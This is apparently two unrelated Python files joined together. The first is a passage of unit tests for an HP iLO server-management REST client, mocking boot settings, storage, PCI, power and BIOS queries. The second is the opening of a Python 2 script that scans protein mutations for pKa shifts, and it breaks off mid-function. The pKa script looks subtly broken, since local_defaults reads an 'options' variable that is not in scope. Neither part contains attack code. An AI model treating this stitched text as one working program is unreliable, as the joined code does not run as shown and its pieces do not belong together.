def test__get_vm_device_status_invalid_device(self):
self.assertRaises(exception.IloInvalidInputError,
self.client._get_vm_device_status, device='FOO')
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
def test__get_vm_device_status_vmedia_not_supported(self,
ilo_details_mock):
manager_uri = '/rest/v1/Managers/1'
manager_data = json.loads(ris_outputs.GET_MANAGER_DETAILS_NO_VMEDIA)
ilo_details_mock.return_value = (manager_data, manager_uri)
self.assertRaises(exception.IloCommandNotSupportedError,
self.client._get_vm_device_status, device='FLOPPY')
ilo_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
@mock.patch.object(ris.RISOperations, '_get_collection')
def test__get_vm_device_status_fail(self,
collection_mock,
ilo_details_mock,
get_mock):
manager_uri = '/rest/v1/Managers/1'
manager_data = json.loads(ris_outputs.GET_MANAGER_DETAILS)
ilo_details_mock.return_value = (manager_data, manager_uri)
collection_item = json.loads(ris_outputs.RESP_VM_STATUS_FLOPPY_EMPTY)
vmedia_uri = '/rest/v1/Managers/1/VirtualMedia'
member_uri = '/rest/v1/Managers/1/VirtualMedia/1'
collection_mock.return_value = [(200, None, collection_item,
member_uri)]
get_mock.return_value = (301, ris_outputs.GET_HEADERS,
ris_outputs.REST_FAILURE_OUTPUT)
self.assertRaises(exception.IloError,
self.client._get_vm_device_status, device='FLOPPY')
ilo_details_mock.assert_called_once_with()
collection_mock.assert_called_once_with(vmedia_uri)
get_mock.assert_called_once_with(member_uri)
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_ilo_details')
@mock.patch.object(ris.RISOperations, '_get_collection')
def test__get_vm_device_status_device_missing(self,
collection_mock,
ilo_details_mock,
get_mock):
manager_uri = '/rest/v1/Managers/1'
manager_data = json.loads(ris_outputs.GET_MANAGER_DETAILS)
ilo_details_mock.return_value = (manager_data, manager_uri)
collection_item = json.loads(ris_outputs.RESP_VM_STATUS_CDROM_MISSING)
vmedia_uri = '/rest/v1/Managers/1/VirtualMedia'
member_uri = '/rest/v1/Managers/1/VirtualMedia/2'
collection_mock.return_value = [(200, None, collection_item,
member_uri)]
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
collection_item)
self.assertRaises(exception.IloError,
self.client._get_vm_device_status, device='CDROM')
ilo_details_mock.assert_called_once_with()
collection_mock.assert_called_once_with(vmedia_uri)
get_mock.assert_called_once_with(member_uri)
@mock.patch.object(ris.RISOperations, '_rest_patch')
def test__update_persistent_boot_once(self, rest_patch_mock):
systems_uri = "/rest/v1/Systems/1"
new_boot_settings = {}
new_boot_settings['Boot'] = {'BootSourceOverrideEnabled': 'Once',
'BootSourceOverrideTarget': 'Cd'}
rest_patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client._update_persistent_boot(['cdrom'], persistent=False)
rest_patch_mock.assert_called_once_with(systems_uri, None,
new_boot_settings)
@mock.patch.object(ris.RISOperations, '_rest_patch')
def test__update_persistent_boot_for_continuous(self, rest_patch_mock):
systems_uri = "/rest/v1/Systems/1"
new_boot_settings = {}
new_boot_settings['Boot'] = {'BootSourceOverrideEnabled': 'Continuous',
'BootSourceOverrideTarget': 'Cd'}
rest_patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client._update_persistent_boot(['cdrom'], persistent=True)
rest_patch_mock.assert_called_once_with(systems_uri, None,
new_boot_settings)
@mock.patch.object(ris.RISOperations, '_rest_patch')
def test__update_persistent_boot_for_UefiShell(self, rest_patch_mock):
systems_uri = "/rest/v1/Systems/1"
new_boot_settings = {}
new_boot_settings['Boot'] = {'BootSourceOverrideEnabled': 'Continuous',
'BootSourceOverrideTarget': 'UefiShell'}
rest_patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client._update_persistent_boot(['UefiShell'],
persistent=True)
rest_patch_mock.assert_called_once_with(systems_uri, None,
new_boot_settings)
@mock.patch.object(ris.RISOperations, '_get_host_details')
@mock.patch.object(ris.RISOperations, '_rest_patch')
def test__update_persistent_boot_for_iscsi(self, rest_patch_mock,
get_host_mock):
get_host_mock.return_value = (
json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP_WITH_ISCSI))
systems_uri = '/rest/v1/Systems/1'
new1_boot_settings = {}
new1_boot_settings['Boot'] = {'UefiTargetBootSourceOverride':
u'NIC.LOM.1.1.iSCSI'}
new2_boot_settings = {}
new2_boot_settings['Boot'] = {'BootSourceOverrideEnabled':
'Continuous', 'BootSourceOverrideTarget':
'UefiTarget'}
rest_patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
calls = [mock.call(systems_uri, None, new1_boot_settings),
mock.call(systems_uri, None, new2_boot_settings)]
self.client._update_persistent_boot(['ISCSI'], persistent=True)
rest_patch_mock.assert_has_calls(calls)
@mock.patch.object(ris.RISOperations, '_get_host_details')
@mock.patch.object(ris.RISOperations, '_rest_patch')
def test__update_persistent_boot_for_iscsi_with_none_device_present(
self, rest_patch_mock, get_host_mock):
get_host_mock.return_value = (
json.loads(
ris_outputs.RESPONSE_BODY_FOR_REST_OP_WITH_ISCSI_AND_NONE))
systems_uri = '/rest/v1/Systems/1'
new1_boot_settings = {}
new1_boot_settings['Boot'] = {'UefiTargetBootSourceOverride':
u'NIC.LOM.1.1.iSCSI'}
new2_boot_settings = {}
new2_boot_settings['Boot'] = {'BootSourceOverrideEnabled':
'Continuous', 'BootSourceOverrideTarget':
'UefiTarget'}
rest_patch_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
calls = [mock.call(systems_uri, None, new1_boot_settings),
mock.call(systems_uri, None, new2_boot_settings)]
self.client._update_persistent_boot(['ISCSI'], persistent=True)
rest_patch_mock.assert_has_calls(calls)
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test__update_persistent_boot_for_iscsi_not_found(self,
get_host_mock):
get_host_mock.return_value = (
json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP))
self.assertRaisesRegex(exception.IloError, "No UEFI iSCSI bootable "
"device found",
self.client._update_persistent_boot,
['ISCSI'], persistent=True)
@mock.patch.object(ris.RISOperations, '_rest_patch')
def test__update_persistent_boot_fail(self, rest_patch_mock):
systems_uri = "/rest/v1/Systems/1"
new_boot_settings = {}
new_boot_settings['Boot'] = {'BootSourceOverrideEnabled': 'Continuous',
'BootSourceOverrideTarget': 'FakeDevice'}
rest_patch_mock.return_value = (301, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.assertRaises(exception.IloError,
self.client._update_persistent_boot,
['FakeDevice'], persistent=True)
rest_patch_mock.assert_called_once_with(systems_uri, None,
new_boot_settings)
@mock.patch.object(ris.RISOperations, '_get_bios_boot_resource')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test__get_persistent_boot_devices_no_boot_order(self,
check_bios_mock,
boot_mock):
bios_uri = '/rest/v1/systems/1/bios'
bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, bios_settings)
boot_settings = json.loads(ris_outputs.BOOT_PERS_DEV_ORDER_MISSING)
boot_mock.return_value = boot_settings
self.assertRaises(exception.IloError,
self.client._get_persistent_boot_devices)
check_bios_mock.assert_called_once_with()
boot_mock.assert_called_once_with(bios_settings)
@mock.patch.object(ris.RISOperations, '_get_bios_boot_resource')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test__get_persistent_boot_devices(self, check_bios_mock, boot_mock):
bios_uri = '/rest/v1/systems/1/bios'
bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, bios_settings)
boot_settings = json.loads(ris_outputs.GET_BIOS_BOOT)
boot_mock.return_value = boot_settings
exp_boot_src = json.loads(ris_outputs.UEFI_BootSources)
exp_boot_order = ris_outputs.UEFI_PERS_BOOT_DEVICES
boot_src, boot_order = self.client._get_persistent_boot_devices()
check_bios_mock.assert_called_once_with()
boot_mock.assert_called_once_with(bios_settings)
self.assertEqual(boot_src, exp_boot_src)
self.assertEqual(boot_order, exp_boot_order)
@mock.patch.object(ris.RISOperations, '_get_bios_boot_resource')
@mock.patch.object(ris.RISOperations, '_check_bios_resource')
def test__get_persistent_boot_devices_no_bootsources(self,
check_bios_mock,
boot_mock):
bios_uri = '/rest/v1/systems/1/bios'
bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
check_bios_mock.return_value = (ris_outputs.GET_HEADERS,
bios_uri, bios_settings)
boot_settings = json.loads(ris_outputs.UEFI_BOOTSOURCES_MISSING)
boot_mock.return_value = boot_settings
self.assertRaises(exception.IloError,
self.client._get_persistent_boot_devices)
check_bios_mock.assert_called_once_with()
boot_mock.assert_called_once_with(bios_settings)
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test__get_pci_devices(self, get_host_details_mock, get_mock):
system_data = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
get_host_details_mock.return_value = system_data
pci_uri = '/rest/v1/Systems/1/PCIDevices'
pci_device_list = json.loads(ris_outputs.PCI_DEVICE_DETAILS)
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
pci_device_list)
self.client._get_pci_devices()
get_mock.assert_called_once_with(pci_uri)
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test__get_pci_devices_fail(self, get_host_details_mock,
get_mock):
system_data = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
get_host_details_mock.return_value = system_data
pci_uri = '/rest/v1/Systems/1/PCIDevices'
pci_device_list = json.loads(ris_outputs.PCI_DEVICE_DETAILS)
get_mock.return_value = (301, ris_outputs.GET_HEADERS,
pci_device_list)
self.assertRaises(exception.IloError,
self.client._get_pci_devices)
get_mock.assert_called_once_with(pci_uri)
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test__get_pci_devices_not_supported(self, get_details_mock):
host_response = json.loads(ris_outputs.RESPONSE_BODY_FOR_REST_OP)
del host_response['Oem']['Hp']['links']['PCIDevices']
get_details_mock.return_value = host_response
self.assertRaises(exception.IloCommandNotSupportedError,
self.client._get_pci_devices)
get_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test__get_storage_resource(self, get_host_details_mock, get_mock):
system_data = json.loads(ris_outputs.REST_GET_SMART_STORAGE)
get_host_details_mock.return_value = system_data
storage_uri = '/rest/v1/Systems/1/SmartStorage'
storage_settings = json.loads(ris_outputs.STORAGE_SETTINGS)
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
storage_settings)
self.client._get_storage_resource()
get_mock.assert_called_once_with(storage_uri)
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test__get_storage_resource_fail(self, get_host_details_mock,
get_mock):
system_data = json.loads(ris_outputs.REST_GET_SMART_STORAGE)
get_host_details_mock.return_value = system_data
storage_uri = '/rest/v1/Systems/1/SmartStorage'
storage_settings = json.loads(ris_outputs.STORAGE_SETTINGS)
get_mock.return_value = (301, ris_outputs.GET_HEADERS,
storage_settings)
self.assertRaises(exception.IloError,
self.client._get_storage_resource)
get_mock.assert_called_once_with(storage_uri)
@mock.patch.object(ris.RISOperations, '_get_host_details')
def test__get_storage_resource_not_supported(self,
get_host_details_mock):
system_data = json.loads(ris_outputs.REST_GET_SMART_STORAGE)
del system_data['Oem']['Hp']['links']['SmartStorage']
get_host_details_mock.return_value = system_data
self.assertRaises(exception.IloCommandNotSupportedError,
self.client._get_storage_resource)
get_host_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_storage_resource')
def test__get_array_controller_resource(self, storage_mock, get_mock):
storage_data = json.loads(ris_outputs.STORAGE_SETTINGS)
storage_uri = '/rest/v1/Systems/1/SmartStorage'
storage_mock.return_value = (ris_outputs.GET_HEADERS,
storage_uri,
storage_data)
array_uri = '/rest/v1/Systems/1/SmartStorage/ArrayControllers'
array_settings = json.loads(ris_outputs.ARRAY_SETTINGS)
get_mock.return_value = (200, ris_outputs.GET_HEADERS,
array_settings)
self.client._get_array_controller_resource()
get_mock.assert_called_once_with(array_uri)
@mock.patch.object(ris.RISOperations, '_rest_get')
@mock.patch.object(ris.RISOperations, '_get_storage_resource')
def test__get_array_controller_resource_fail(self, storage_mock,
get_mock):
storage_data = json.loads(ris_outputs.STORAGE_SETTINGS)
storage_uri = '/rest/v1/Systems/1/SmartStorage'
storage_mock.return_value = (ris_outputs.GET_HEADERS,
storage_uri,
storage_data)
array_uri = '/rest/v1/Systems/1/SmartStorage/ArrayControllers'
array_settings = json.loads(ris_outputs.ARRAY_SETTINGS)
get_mock.return_value = (301, ris_outputs.GET_HEADERS,
array_settings)
self.assertRaises(exception.IloError,
self.client._get_array_controller_resource)
get_mock.assert_called_once_with(array_uri)
@mock.patch.object(ris.RISOperations, '_get_storage_resource')
def test__get_array_controller_resource_not_supported(self,
storage_mock):
storage_data = json.loads(ris_outputs.STORAGE_SETTINGS)
storage_uri = '/rest/v1/Systems/1/SmartStorage'
del storage_data['links']['ArrayControllers']
storage_mock.return_value = (ris_outputs.GET_HEADERS,
storage_uri,
storage_data)
self.assertRaises(exception.IloCommandNotSupportedError,
self.client._get_array_controller_resource)
storage_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_array_controller_resource')
def test__create_list_of_array_controllers(self, array_mock):
array_data = json.loads(ris_outputs.ARRAY_SETTINGS)
array_uri = '/rest/v1/Systems/1/SmartStorage/ArrayControllers'
array_mock.return_value = (ris_outputs.GET_HEADERS,
array_uri,
array_data)
expected_uri_links = (
[{u'href': u'/rest/v1/Systems/1/SmartStorage/ArrayControllers/0'}])
uri_links = self.client._create_list_of_array_controllers()
self.assertEqual(expected_uri_links, uri_links)
array_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_array_controller_resource')
def test__create_list_of_array_controllers_fail(self, array_mock):
array_data = json.loads(ris_outputs.ARRAY_SETTINGS)
array_uri = '/rest/v1/Systems/1/SmartStorage/ArrayControllers'
del array_data['links']['Member']
array_mock.return_value = (ris_outputs.GET_HEADERS,
array_uri,
array_data)
self.assertRaises(exception.IloCommandNotSupportedError,
self.client._create_list_of_array_controllers)
array_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_physical_drive_resource')
def test__get_drive_type_and_speed(self, disk_details_mock):
disk_details_mock.return_value = (
json.loads(ris_outputs.DISK_DETAILS_LIST))
expected_out = {'has_rotational': 'true',
'rotational_drive_10000_rpm': 'true'}
out = self.client._get_drive_type_and_speed()
self.assertEqual(expected_out, out)
disk_details_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_create_list_of_array_controllers')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_drive_resource_physical(self, get_mock, array_mock):
array_mock.return_value = (
[{u'href': u'/rest/v1/Systems/1/SmartStorage/ArrayControllers/0'}])
get_mock.side_effect = [(ris_outputs.GET_HEADERS, 'xyz',
json.loads(ris_outputs.ARRAY_MEM_SETTINGS)),
(ris_outputs.GET_HEADERS, 'xyz',
json.loads(ris_outputs.DISK_COLLECTION)),
(ris_outputs.GET_HEADERS, 'xyz',
json.loads(ris_outputs.DISK_DETAILS_LIST))]
out = self.client._get_physical_drive_resource()
expected_out = []
expected_out.append(json.loads(ris_outputs.DISK_DETAILS_LIST))
self.assertEqual(expected_out, out)
array_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_create_list_of_array_controllers')
@mock.patch.object(ris.RISOperations, '_rest_get')
def test__get_drive_resource_logical(self, get_mock, array_mock):
array_mock.return_value = (
[{u'href': u'/rest/v1/Systems/1/SmartStorage/ArrayControllers/0'}])
get_mock.side_effect = [(ris_outputs.GET_HEADERS, 'xyz',
json.loads(ris_outputs.ARRAY_MEM_SETTINGS)),
(ris_outputs.GET_HEADERS, 'xyz',
json.loads(ris_outputs.LOGICAL_COLLECTION)),
(ris_outputs.GET_HEADERS, 'xyz',
json.loads(ris_outputs.LOGICAL_DETAILS))]
out = self.client._get_logical_drive_resource()
expected_out = []
expected_out.append(json.loads(ris_outputs.LOGICAL_DETAILS))
self.assertEqual(expected_out, out)
array_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_pci_devices')
def test__get_gpu_pci_devices(self, pci_mock):
pci_mock.return_value = json.loads(ris_outputs.PCI_DEVICE_DETAILS)
pci_gpu_list = self.client._get_gpu_pci_devices()
self.assertEqual(pci_gpu_list, json.loads(ris_outputs.PCI_GPU_LIST))
self.assertTrue(pci_mock.called)
@mock.patch.object(ris.RISOperations, '_get_pci_devices')
def test__get_gpu_pci_devices_returns_empty(self, pci_mock):
pci_response = json.loads(ris_outputs.PCI_DEVICE_DETAILS_NO_GPU)
pci_mock.return_value = pci_response
pci_gpu_list = self.client._get_gpu_pci_devices()
self.assertEqual(len(pci_gpu_list), 0)
self.assertTrue(pci_mock.called)
@mock.patch.object(ris.RISOperations, '_get_pci_devices')
def test__get_gpu_pci_devices_fail_not_supported_error(self, pci_mock):
msg = ('links/PCIDevices section in ComputerSystem/Oem/Hp'
' does not exist')
pci_mock.side_effect = exception.IloCommandNotSupportedError(msg)
self.assertRaises(exception.IloCommandNotSupportedError,
self.client._get_gpu_pci_devices)
self.assertTrue(pci_mock.called)
@mock.patch.object(ris.RISOperations, '_get_gpu_pci_devices')
def test__get_number_of_gpu_devices_connected(self, gpu_list_mock):
gpu_list_mock.return_value = json.loads(ris_outputs.PCI_GPU_LIST)
expected_gpu_count = {'pci_gpu_devices': 1}
gpu_count_returned = self.client._get_number_of_gpu_devices_connected()
self.assertEqual(gpu_count_returned, expected_gpu_count)
self.assertTrue(gpu_list_mock.called)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test___get_cpu_virtualization_enabled(self, bios_mock):
bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
bios_mock.return_value = bios_settings['ProcVirtualization']
expected_cpu_vt = True
cpu_vt_return = self.client._get_cpu_virtualization()
self.assertEqual(cpu_vt_return, expected_cpu_vt)
self.assertTrue(bios_mock.called)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test___get_cpu_virtualization_disabled(self, bios_mock):
bios_mock.return_value = 'Disable'
expected_cpu_vt = False
cpu_vt_return = self.client._get_cpu_virtualization()
self.assertEqual(cpu_vt_return, expected_cpu_vt)
self.assertTrue(bios_mock.called)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test___get_cpu_virtualization_not_supported_error(self, bios_mock):
msg = ("BIOS Property 'ProcVirtualization' is not supported on this"
" system")
bios_mock.side_effect = exception.IloCommandNotSupportedError(msg)
expected_cpu_vt = False
cpu_vt_return = self.client._get_cpu_virtualization()
self.assertEqual(cpu_vt_return, expected_cpu_vt)
self.assertTrue(bios_mock.called)
@mock.patch.object(ris.RISOperations, '_get_ilo_details', autospec=True)
def test__get_firmware_update_service_resource_traverses_manager_as(
self, _get_ilo_details_mock):
# | GIVEN |
manager_mock = mock.MagicMock(spec=dict, autospec=True)
_get_ilo_details_mock.return_value = (manager_mock, 'some_uri')
# | WHEN |
self.client._get_firmware_update_service_resource()
# | THEN |
manager_mock.__getitem__.assert_called_once_with('Oem')
manager_mock.__getitem__().__getitem__.assert_called_once_with('Hp')
(manager_mock.__getitem__().__getitem__().__getitem__.
assert_called_once_with('links'))
(manager_mock.__getitem__().__getitem__().__getitem__().
__getitem__.assert_called_once_with('UpdateService'))
(manager_mock.__getitem__().__getitem__().__getitem__().
__getitem__().__getitem__.assert_called_once_with('href'))
@mock.patch.object(ris.RISOperations, '_get_ilo_details', autospec=True)
def test__get_firmware_update_service_resource_throws_if_not_found(
self, _get_ilo_details_mock):
# | GIVEN |
manager_mock = mock.MagicMock(spec=dict)
_get_ilo_details_mock.return_value = (manager_mock, 'some_uri')
manager_mock.__getitem__.side_effect = KeyError('not found')
# | WHEN | & | THEN |
self.assertRaises(exception.IloCommandNotSupportedError,
self.client._get_firmware_update_service_resource)
@mock.patch.object(ris.RISOperations, '_rest_post')
def test_press_pwr_btn(self, rest_post_mock):
systems_uri = "/rest/v1/Systems/1"
new_pow_settings = {"Action": "PowerButton",
"Target": "/Oem/Hp",
"PushType": "Press"}
rest_post_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client._press_pwr_btn()
rest_post_mock.assert_called_once_with(systems_uri, None,
new_pow_settings)
@mock.patch.object(ris.RISOperations, '_rest_post')
def test_press_pwr_btn_patch_fail(self, rest_post_mock):
systems_uri = "/rest/v1/Systems/1"
new_pow_settings = {"Action": "PowerButton",
"Target": "/Oem/Hp",
"PushType": "Press"}
rest_post_mock.return_value = (301, ris_outputs.GET_HEADERS,
ris_outputs.REST_FAILURE_OUTPUT)
self.assertRaises(exception.IloError,
self.client._press_pwr_btn, 'Press')
rest_post_mock.assert_called_once_with(systems_uri, None,
new_pow_settings)
@mock.patch.object(ris.RISOperations, '_rest_post')
def test_perform_power_op(self, rest_post_mock):
systems_uri = "/rest/v1/Systems/1"
new_pow_settings = {"Action": "Reset", "ResetType": "ForceRestart"}
rest_post_mock.return_value = (200, ris_outputs.GET_HEADERS,
ris_outputs.REST_POST_RESPONSE)
self.client.reset_server()
rest_post_mock.assert_called_once_with(systems_uri, None,
new_pow_settings)
@mock.patch.object(ris.RISOperations, '_rest_post')
def test_perform_power_op_fail(self, rest_post_mock):
systems_uri = "/rest/v1/Systems/1"
new_pow_settings = {"Action": "Reset", "ResetType": "ForceRestart"}
rest_post_mock.return_value = (301, ris_outputs.GET_HEADERS,
ris_outputs.REST_FAILURE_OUTPUT)
self.assertRaises(exception.IloError,
self.client.reset_server)
rest_post_mock.assert_called_once_with(systems_uri, None,
new_pow_settings)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test__get_tpm_capability_notpresent(self, bios_mock):
bios_mock.return_value = 'NotPresent'
expected_out = False
status = self.client._get_tpm_capability()
self.assertEqual(expected_out, status)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test__get_tpm_capability_presentdisabled(self, bios_mock):
bios_mock.return_value = 'PresentDisabled'
expected_out = True
status = self.client._get_tpm_capability()
self.assertEqual(expected_out, status)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test__get_tpm_capability_presentenabled(self, bios_mock):
bios_mock.return_value = 'PresentEnabled'
expected_out = True
status = self.client._get_tpm_capability()
self.assertEqual(expected_out, status)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test__get_tpm_capability_resource_notpresent(self, bios_mock):
msg = 'BIOS Property TpmState is not supported on this system.'
bios_mock.side_effect = exception.IloCommandNotSupportedError(msg)
expected_out = False
status = self.client._get_tpm_capability()
self.assertEqual(expected_out, status)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test___get_nvdimm_n_status_enabled(self, bios_mock):
bios_settings = json.loads(ris_outputs.GET_BIOS_SETTINGS)
bios_mock.return_value = bios_settings['NvDimmNMemFunctionality']
expected_nvdimm_n_status = True
nvdimm_n_status_return = self.client._get_nvdimm_n_status()
self.assertEqual(nvdimm_n_status_return, expected_nvdimm_n_status)
self.assertTrue(bios_mock.called)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test___get_nvdimm_n_status_disabled(self, bios_mock):
bios_mock.return_value = 'Disabled'
expected_nvdimm_n_status = False
nvdimm_n_status_return = self.client._get_nvdimm_n_status()
self.assertEqual(nvdimm_n_status_return, expected_nvdimm_n_status)
self.assertTrue(bios_mock.called)
@mock.patch.object(ris.RISOperations, '_get_bios_setting')
def test___get_nvdimm_n_status_not_supported_error(self, bios_mock):
msg = ("BIOS Property 'NvDimmNMemFunctionality' is not supported on"
" this system")
bios_mock.side_effect = exception.IloCommandNotSupportedError(msg)
expected_nvdimm_n_status = False
nvdimm_n_status_return = self.client._get_nvdimm_n_status()
self.assertEqual(nvdimm_n_status_return, expected_nvdimm_n_status)
self.assertTrue(bios_mock.called)
@mock.patch.object(ris.RISOperations, '_get_array_controller_resource')
def test__is_raid_supported(self, get_array_mock):
array_settings = json.loads(ris_outputs.ARRAY_SETTINGS)
get_array_mock.return_value = (200, ris_outputs.GET_HEADERS,
array_settings)
expt_ret = True
ret = self.client._is_raid_supported()
self.assertEqual(ret, expt_ret)
get_array_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, '_get_array_controller_resource')
def test__is_raid_supported_false(self, get_array_mock):
array_settings = json.loads(ris_outputs.ARRAY_SETTING_NO_CONTROLLER)
get_array_mock.return_value = (200, ris_outputs.GET_HEADERS,
array_settings)
expt_ret = False
ret = self.client._is_raid_supported()
self.assertEqual(ret, expt_ret)
get_array_mock.assert_called_once_with()
@mock.patch.object(ris.RISOperations, 'get_product_name')
def test_delete_raid_configuration(self, product_name_mock):
product_name_mock.return_value = 'ProLiant BL460c Gen9'
self.assertRaisesRegexp(exception.IloCommandNotSupportedError,
'ProLiant BL460c Gen9',
self.client.delete_raid_configuration)
@mock.patch.object(ris.RISOperations, 'get_product_name')
def test_create_raid_configuration(self, product_name_mock):
ld1 = {"size_gb": 150, "raid_level": '0', "is_root_volume": True}
raid_config = {"logical_disks": [ld1]}
product_name_mock.return_value = 'ProLiant BL460c Gen9'
self.assertRaisesRegexp(exception.IloCommandNotSupportedError,
'ProLiant BL460c Gen9',
self.client.create_raid_configuration,
raid_config)
|
<filename>pKa/pKa_mutscan.py
#!/usr/bin/env python
#
# pKa - various programs and scripts for pKa value analysis, calculation and redesign
# Copyright (C) 2010 <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact information:
# Email: Jens.Nielsen_at_gmail.com
# Normal mail:
# <NAME>
# SBBS, Conway Institute
# University College Dublin
# Dublin 4, Ireland
"""This script calculates delta pKa values for one or more residues for a list of mutations"""
#
# -------------------------
#
def local_defaults(pdbfile,target_residues,recalc_intpka):
"""
# Set the parameters that are the same for all mutations
"""
import pKa.Design_pKa as Design_pKa
defaults=Design_pKa.get_defaults()
# PDB file
defaults['pdb'][0]=pdbfile
#
# pKa calculation parameters
#
#defaults['pHstart'][0]=0.1
#defaults['pHstop'][0]=12.0
defaults['pHstep'][0]=0.01
defaults['pKMCsteps'][0]=200000
#
# Design settings
#
# Target
#
#target_residues=target_residues.split(',')
target_text=''
for target in target_residues:
target_text=target_text+target+'=0.0,' # Dummy pKa value
defaults['pKas'][0]=target_text[:-1]
#
# Method
#
defaults['dpKa_method']=['MC','junk']
defaults['tabulated'][0]=0
defaults['MCsteps'][0]=0
defaults['stability_mode']=[False,'junk']
defaults['PBEsolver']=['DelPhi','junk']
#
# Be not-so-noisy
#
defaults['verbose'][0]=5
#
# Minimum distance between target and mutation
#
#defaults['min_target_dist'][0]=min_dist
#
# Do not save the solutions
#
defaults['save_solutions'][0]=None
#
#
defaults['recalc_intpka'][0]=options.recalc_intpka
defaults['recalc_intpka_dist'][0]=options.recalc_intpka_dist
defaults['use_titration_curves'][0]=1
defaults['calc_dpka'][0]=1
defaults['generate_mutations'][0]=False
defaults['mutation_quality'][0]=0.5
return defaults
#
# ----
#
def main(options,args):
"""Load the PDB file and the list of mutations"""
import sys
pdbfile=args[0]
target_residues=options.target_groups
#
# Load the PDB file
#
import Protool
P=Protool.structureIO()
P.readpdb(pdbfile)
residues=P.residues.keys()
residues.sort()
if not options.allmutations:
#
# Load the mutations
#
mutfile=args[1]
fd=open(mutfile)
mutlines=fd.readlines()
fd.close()
else:
mutlines=[]
aas=P.trueaminoacids.keys()
aas.sort()
count=1
for residue in residues:
for aa in aas:
if aa==P.resname(residue):
continue
mutlines.append('clone%d,%s:%s:%s' %(count,residue,P.resname(residue),aa))
count=count+1
print 'Created %d mutant proteins each containing 1 mutation' %len(mutlines)
#
# Make the resultdir
#
import os
resultdir=os.path.join(os.getcwd(),'pKa_mutscan_results')
if not os.path.isdir(resultdir):
os.mkdir(resultdir)
#
# which target residues
#
if target_residues==[] or target_residues==['ALL']:
target_residues=P.get_titratable_groups()
import string
target_residues=string.join(target_residues,',')
results={}
import pickle, os
for mline in mutlines:
import string
if mline[0]=='#' or mline[:2]=='//':
continue
#
line=string.strip(mline)
sp_line=line.split(',')
variant_name=sp_line[0]
mutation=sp_line[1]
print 'Variant: %s, mutations: %s' %(variant_name,mutation)
if mutation.find('insert')!=-1:
print 'Skipping insertions'
continue
#
# Define result filename
#
resultfile=os.path.join(resultdir,'mutscan_%s.result' %variant_name)
if os.path.isfile(resultfile):
fd=open(resultfile)
results[variant_name]=pickle.load(fd)
fd.close()
#print 'Already did',mutation
else:
recalc_intpka=1
defaults=local_defaults(pdbfile,target_residues,recalc_intpka)
#
# Set the mutations
#
import string
defaults['mutations'][0]=string.strip(mutation)
print 'Calculating for',mutation
import pKa.Design_pKa as Design_pKa
#
# Set other parameters
#
defaults['ion'][0]=options.ion
#
# Calculate the dpKas
#
#try:
solutions=Design_pKa.run_opt(defaults)
#except Exception,inst:
